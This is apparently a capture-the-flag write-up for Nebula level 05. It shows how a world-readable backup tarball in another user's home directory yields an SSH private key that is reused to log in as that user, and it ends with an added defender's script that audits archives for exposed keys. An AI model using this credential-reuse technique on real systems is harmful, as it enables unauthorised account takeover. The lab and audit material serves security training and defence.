Exploit Exercises: Nebula Level 05

Check the flag05 home directory. You are looking for weak directory permissions. To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

Source code

There is no source code available for this level.

Solution

Of course we are going to log in and go to the flag account folder, but we will be surprised to see this!

level05@nebula:/home/flag05$ ls -al
total 5
drwxr-x--- 4 flag05 level05   93 Aug 18  2012 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
drwxr-xr-x 2 flag05 flag05    42 Nov 20  2011 .backup
-rw-r--r-- 1 flag05 flag05   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag05 flag05  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag05 flag05   675 May 18  2011 .profile
drwx------ 2 flag05 flag05    70 Nov 20  2011 .ssh
level05@nebula:/home/flag05$

Well, under our flag folder we have nothing that we can use. Nada! Yet the flag is still right under our nose! The best hint for this challenge is “You are looking for weak directory permissions”. So if we run this command:

level05@nebula:/home/flag05$ ls -lAh
total 5.0K
drwxr-xr-x 2 flag05 flag05   42 Nov 20  2011 .backup
-rw-r--r-- 1 flag05 flag05  220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag05 flag05 3.3K May 18  2011 .bashrc
-rw-r--r-- 1 flag05 flag05  675 May 18  2011 .profile
drwx------ 2 flag05 flag05   70 Nov 20  2011 .ssh
level05@nebula:/home/flag05$

Or just this:

level05@nebula:/home/flag05$ ls -al /home/flag05/
total 5
drwxr-x--- 4 flag05 level05   93 Aug 18  2012 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
drwxr-xr-x 2 flag05 flag05    42 Nov 20  2011 .backup
-rw-r--r-- 1 flag05 flag05   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag05 flag05  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag05 flag05   675 May 18  2011 .profile
drwx------ 2 flag05 flag05    70 Nov 20  2011 .ssh
level05@nebula:/home/flag05$

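We will observe a hidden folder called “.backup” with the permissions drwxr-xr-x: unlike .ssh (drwx------), anyone who can enter /home/flag05 can list and read it, and the level05 group can enter (drwxr-x--- flag05 level05). All fine, let’s see what is in it!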

level05@nebula:/home/flag05/.backup$ tar -xzvf backup-19072011.tgz
.ssh/
tar: .ssh: Cannot mkdir: Permission denied
.ssh/id_rsa.pub
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/id_rsa.pub: Cannot open: No such file or directory
.ssh/id_rsa
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/id_rsa: Cannot open: No such file or directory
.ssh/authorized_keys
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/authorized_keys: Cannot open: No such file or directory
tar: Exiting with failure status due to previous errors
level05@nebula:/home/flag05/.backup$ ls -al
total 2
drwxr-xr-x 2 flag05 flag05    42 Nov 20  2011 .
drwxr-x--- 4 flag05 level05   93 Aug 18  2012 ..
-rw-rw-r-- 1 flag05 flag05  1826 Nov 20  2011 backup-19072011.tgz
level05@nebula:/home/flag05/.backup$

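Uuuuuuuuuuuu, permission denied on the “tar -xzvf backup-19072011.tgz” command! Nope. We can read the archive, but tar cannot create .ssh here because .backup is writable only by flag05. Let’s copy it to another folder that we control (~/ or /tmp) and unpack the tgz there.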

level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz ~/
level05@nebula:/home/flag05/.backup$ cd ~/
level05@nebula:~$ ls
backup-19072011.tgz
level05@nebula:~$ ls -al
total 9
drwxr-x--- 1 level05 level05   80 Oct 18 12:43 .
drwxr-xr-x 1 root    root      80 Aug 27  2012 ..
-rw-r--r-- 1 level05 level05  220 May 18  2011 .bash_logout
-rw-r--r-- 1 level05 level05 3353 May 18  2011 .bashrc
drwx------ 2 level05 level05   60 Oct 18 12:27 .cache
-rw-r--r-- 1 level05 level05  675 May 18  2011 .profile
drwx------ 2 level05 level05    3 Aug 27  2012 .ssh
-rw-rw-r-- 1 level05 level05 1826 Oct 18 12:43 backup-19072011.tgz
level05@nebula:~$ mkdir ./test
level05@nebula:~$ tar -xvzf backup-19072011.tgz -C ./test
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:~$

Fun time. I’ve seen people trying to get the SSH key and to find the password in order to connect to the flag account in order to execute getflag to finish the task.

You could try this also if you want to waste your time on this task.

level05@nebula:~/test/.ssh$ ls -al
total 12
drwxr-xr-x 2 level05 level05  100 Jul 19  2011 .
drwxrwxr-x 3 level05 level05   60 Oct 18 12:44 ..
-rw-r--r-- 1 level05 level05  394 Jul 19  2011 authorized_keys
-rw------- 1 level05 level05 1675 Jul 19  2011 id_rsa
-rw-r--r-- 1 level05 level05  394 Jul 19  2011 id_rsa.pub
level05@nebula:~/test/.ssh$ cat ./id_rsa
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
level05@nebula:~/test/.ssh$

Or you could reason that the .tgz file is called backup, so it might be a backup of this system and could also store the keys and passwords for SSH. In other, smarter words:

level05@nebula:~/test/.ssh$ cp id_rsa /home/level05/.ssh/
level05@nebula:~/test/.ssh$ ssh flag05@192.168.0.101

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/

    exploit-exercises.com/nebula


For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).


Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

flag05@nebula:~$ id
uid=994(flag05) gid=994(flag05) groups=994(flag05)
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
flag05@nebula:~$

Yes, we do not need any password at all, just the SSH private key: the backup contains authorized_keys alongside the key pair, so the flag05 account already trusts this key. Keep in mind: Be lazy!
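
A defender's check for the condition this level relies on, as an added example that is not part of the original post: it reports tar archives that group or other can read and that contain private key material, together with the archive and directory modes. It assumes GNU find, stat and tar; the function names and the sample tree are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original post). Assumes GNU find, stat and tar.
# Run it as root over /home so every directory can be traversed.

# audit_backups ROOT
# Prints "<archive mode> <directory mode> <archive> <member>" for every tar
# archive under ROOT that group or other can read and that holds a private key.
audit_backups() {
    root=$1
    find "$root" -type f \( -name '*.tgz' -o -name '*.tar.gz' -o -name '*.tar' \) \
        -perm /044 2>/dev/null |
    while IFS= read -r archive; do
        amode=$(stat -c '%a' "$archive")
        dmode=$(stat -c '%a' "$(dirname "$archive")")
        # Skip directory entries; inspect each remaining member's content.
        tar -tf "$archive" 2>/dev/null | grep -v '/$' |
        while IFS= read -r member; do
            # -O streams the member to stdout, so nothing is written to disk.
            # "--" stops a hostile member name being parsed as a tar option.
            if tar -xOf "$archive" -- "$member" 2>/dev/null |
                   grep -q -e '-----BEGIN [A-Z ]*PRIVATE KEY-----'; then
                printf '%s %s %s %s\n' "$amode" "$dmode" "$archive" "$member"
            fi
        done
    done
}

# Constructed sample tree mirroring the level: a readable .backup directory
# holding a tarball of .ssh (dummy key text), plus an owner-only copy.
make_demo_tree() {
    demo=$(mktemp -d)
    mkdir -p "$demo/src/.ssh" "$demo/home/.backup"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'CONSTRUCTED-NOT-A-KEY' \
        '-----END RSA PRIVATE KEY-----' > "$demo/src/.ssh/id_rsa"
    echo 'ssh-rsa CONSTRUCTED' > "$demo/src/.ssh/id_rsa.pub"
    tar -czf "$demo/home/.backup/backup-demo.tgz" -C "$demo/src" .ssh
    tar -czf "$demo/home/private.tgz" -C "$demo/src" .ssh
    chmod 755 "$demo/home/.backup"
    chmod 664 "$demo/home/.backup/backup-demo.tgz"
    chmod 600 "$demo/home/private.tgz"
    echo "$demo/home"
}

home_root=$(make_demo_tree)
audit_backups "$home_root"   # reports only .backup/backup-demo.tgz
rm -rf "${home_root%/home}"
```

The file mode test is an approximation: whether a given user can actually reach an archive also depends on the modes of every parent directory, which is why the directory mode is printed next to it.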

This post is licensed under CC BY 4.0 by the author.